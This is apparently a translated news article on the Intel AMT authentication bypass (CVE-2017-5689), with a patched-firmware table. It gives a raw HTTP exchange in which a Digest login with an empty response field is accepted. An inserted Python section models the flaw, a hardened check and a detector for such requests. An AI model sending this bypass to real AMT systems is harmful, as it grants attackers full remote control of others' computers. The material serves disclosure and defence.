
Vulnerability in Intel AMT turned out to be more serious than they thought.



On May 1, 2017, Intel announced a critical vulnerability in Active Management Technology (AMT) (INTEL-SA-00075, aka CVE-2017-5689). The vulnerability was found by Maxim Malyutin of Embedi, who kept it secret at Intel's request until the official announcement.

Intel AMT is a hardware technology that provides remote, out-of-band access (over an independent auxiliary TCP/IP channel) for managing a computer's settings and security regardless of its power state (it can switch the computer on and off remotely) and the state of the OS. The technology is integrated into the chipset. If it is used as an anti-rootkit for scanning the RAM and the PC's drives, there is no way to bypass such protection. Worse, remote queries to AMT are not recorded in the system log.

A Shodan query currently returns more than 8500 systems with open AMT ports. For some BIOS firmware, patches that fix the AMT bug have not yet been released.
AMT lets system administrators perform various actions on a system remotely: switch computers on and off, change the bootloader code, control input devices, run programs, and so on. In effect, AMT lets you do remotely everything you could do with physical access to the PC.

After reading the description of the technology, you can start imagining what a hacker could do with remote access to a powered-off computer that has AMT. Well, your imaginings were correct. Remote access to AMT is provided through a web interface in the browser. As Maxim found out, any cryptographic hash is accepted for digest access authentication, or none at all; that is, the corresponding field in the authorization form can be left empty.

It doesn't even look like a backdoor, because who would implement one so clumsily?

Systems released after 2010-2011 are vulnerable (see the list of vulnerable firmware below). This is definitely not RCE but rather a logic vulnerability. Maxim Malyutin believes there are several attack vectors through which an attacker could use this vulnerability, perhaps even on Intel systems without Intel AMT support.

“Authentication is still working,” Malyutin explained. “We just found a way around it.”

Through a web browser you can get full access to the AMT functions, as if you knew the system's admin password. Here is how this is done using the local proxy at 127.0.0.1:16992:

GET /index.htm HTTP/1.1
Host: 127.0.0.1:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth"
Content-Type: text/html
Server: AMT
Content-Length: 678
Connection: close

GET /index.htm HTTP/1.1
Host: 127.0.0.1:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Authorization: Digest username="admin", realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="", qop=auth, nc=00000001, cnonce="60513ab58858482c"

HTTP/1.1 200 OK
Date: Thu, 4 May 2017 16:09:17 GMT
Server: AMT
Content-Type: text/html
Transfer-Encoding: chunked
Cache-Control: no cache
Expires: Thu, 26 Oct 1995 00:00:00 GMT

04E6
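The exchange above, modelled in Python as an added example (this is not code from the article, from Embedi or from Intel). It parses the Digest headers from the exchange, computes the response a correct server must expect under RFC 2617, and contrasts a verifier that accepts the empty response="" with a hardened one that rejects it; it also shows the network-side check a defender can run on traffic to AMT ports, since AMT itself logs nothing. The realm, nonce, cnonce and URI are the values from the exchange; the admin password is an assumption. The vulnerable comparison models the root cause published in Embedi's later analysis (a comparison limited to the length of the client-supplied string, strncmp-style), which the article itself does not describe.

```python
import hashlib
import hmac
import re

# Values copied from the exchange shown on this page.
REALM = "Digest:048A0000000000000000000000000000"
NONCE = "qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n"
CNONCE = "60513ab58858482c"

# The Authorization header of the second request above, with response="" left empty.
AUTHORIZATION = (
    'Digest username="admin", realm="%s", nonce="%s", uri="/index.htm", '
    'response="", qop=auth, nc=00000001, cnonce="%s"' % (REALM, NONCE, CNONCE)
)

# Constructed raw HTTP request (sample input for the detector below).
SAMPLE_REQUEST = "\r\n".join([
    "GET /index.htm HTTP/1.1",
    "Host: 127.0.0.1:16992",
    "Authorization: " + AUTHORIZATION,
    "", "",
])

_PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]*))')


def parse_digest_params(header_value):
    """Split a 'Digest k=v, k="v"' header (challenge or credentials) into a dict."""
    if not header_value.startswith("Digest "):
        raise ValueError("not a Digest header")
    params = {}
    for m in _PARAM_RE.finditer(header_value[len("Digest "):]):
        params[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return params


def _md5(text):
    return hashlib.md5(text.encode()).hexdigest()


def expected_response(username, password, method, p):
    """RFC 2617 digest response (qop=auth) that the server must compute and compare."""
    ha1 = _md5(f"{username}:{p['realm']}:{password}")
    ha2 = _md5(f"{method}:{p['uri']}")
    return _md5(f"{ha1}:{p['nonce']}:{p['nc']}:{p['cnonce']}:{p['qop']}:{ha2}")


def vulnerable_check(expected, supplied):
    """Models the published root cause (Embedi's analysis, not stated on this page):
    only strlen(supplied) bytes are compared, so an empty string equals anything."""
    n = len(supplied)
    return expected[:n] == supplied[:n]


def hardened_check(expected, supplied):
    """Full-length, constant-time comparison of the 32-hex-digit response."""
    return len(supplied) == len(expected) and hmac.compare_digest(expected, supplied)


def flags_empty_digest(raw_request):
    """Network-side detection for traffic to AMT ports 16992/16993: True when the
    request carries Digest credentials whose response field is empty."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "authorization":
            try:
                p = parse_digest_params(value.strip())
            except ValueError:
                return False
            return p.get("response") == ""
    return False


def demo(password="hypothetical-admin-password"):  # the password is an assumption
    """Runs the empty-response login against both verifiers and the detector."""
    p = parse_digest_params(AUTHORIZATION)
    good = expected_response(p["username"], password, "GET", p)
    return {
        "vulnerable_accepts_empty": vulnerable_check(good, p["response"]),
        "hardened_accepts_empty": hardened_check(good, p["response"]),
        "hardened_accepts_correct": hardened_check(good, good),
        "detector_flags_request": flags_empty_digest(SAMPLE_REQUEST),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The hardened verifier first checks the length and then uses hmac.compare_digest, so neither a short prefix nor a timing difference leaks anything; the detector is the kind of rule a defender can put in front of port 16992/16993, because the article's point that AMT does not write to the system log means the only place to see these requests is on the wire.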

A few days after the information was disclosed, Tenable released an exploit for the critical AMT privilege-escalation vulnerability. The company offers this tool for detecting vulnerable systems on your own network, so that system administrators know where new firmware versions need to be installed. The exploit is implemented as a Nessus plugin.

In the same days, the largest server and personal computer manufacturers released official security advisories for their customers: from HP, from Dell, from Lenovo, from Fujitsu. Detailed information about vulnerable firmware and links to updated versions will appear there as they become available.

List of patched firmware from Intel

Vulnerable firmware versions   Corresponding CPU generation   Patched firmware
6.0.xx.xxxx                    1st Gen Core                   6.2.61.3535
6.1.xx.xxxx                    1st Gen Core                   6.2.61.3535
6.2.xx.xxxx                    1st Gen Core                   6.2.61.3535
7.0.xx.xxxx                    2nd Gen Core                   7.1.91.3272
7.1.xx.xxxx                    2nd Gen Core                   7.1.91.3272
8.0.xx.xxxx                    3rd Gen Core                   8.1.71.3608
8.1.xx.xxxx                    3rd Gen Core                   8.1.71.3608
9.0.xx.xxxx                    4th Gen Core                   9.1.41.3024
9.1.xx.xxxx                    4th Gen Core                   9.1.41.3024
9.5.xx.xxxx                    4th Gen Core                   9.5.61.3012
10.0.xx.xxxx                   5th Gen Core                   10.0.55.3000
11.0.xx.xxxx                   6th Gen Core                   11.0.25.3001, 11.0.22.3001, 11.0.18.3003
11.5.xx.xxxx                   7th Gen Core                   11.6.27.3264
11.6.xx.xxxx                   7th Gen Core                   11.6.27.3264, 11.6.12.3202

Intel has released an official tool for checking a system for the vulnerability under Windows 7/10, as well as a guide to using it.

Source: https://habr.com/ru/post/403713/
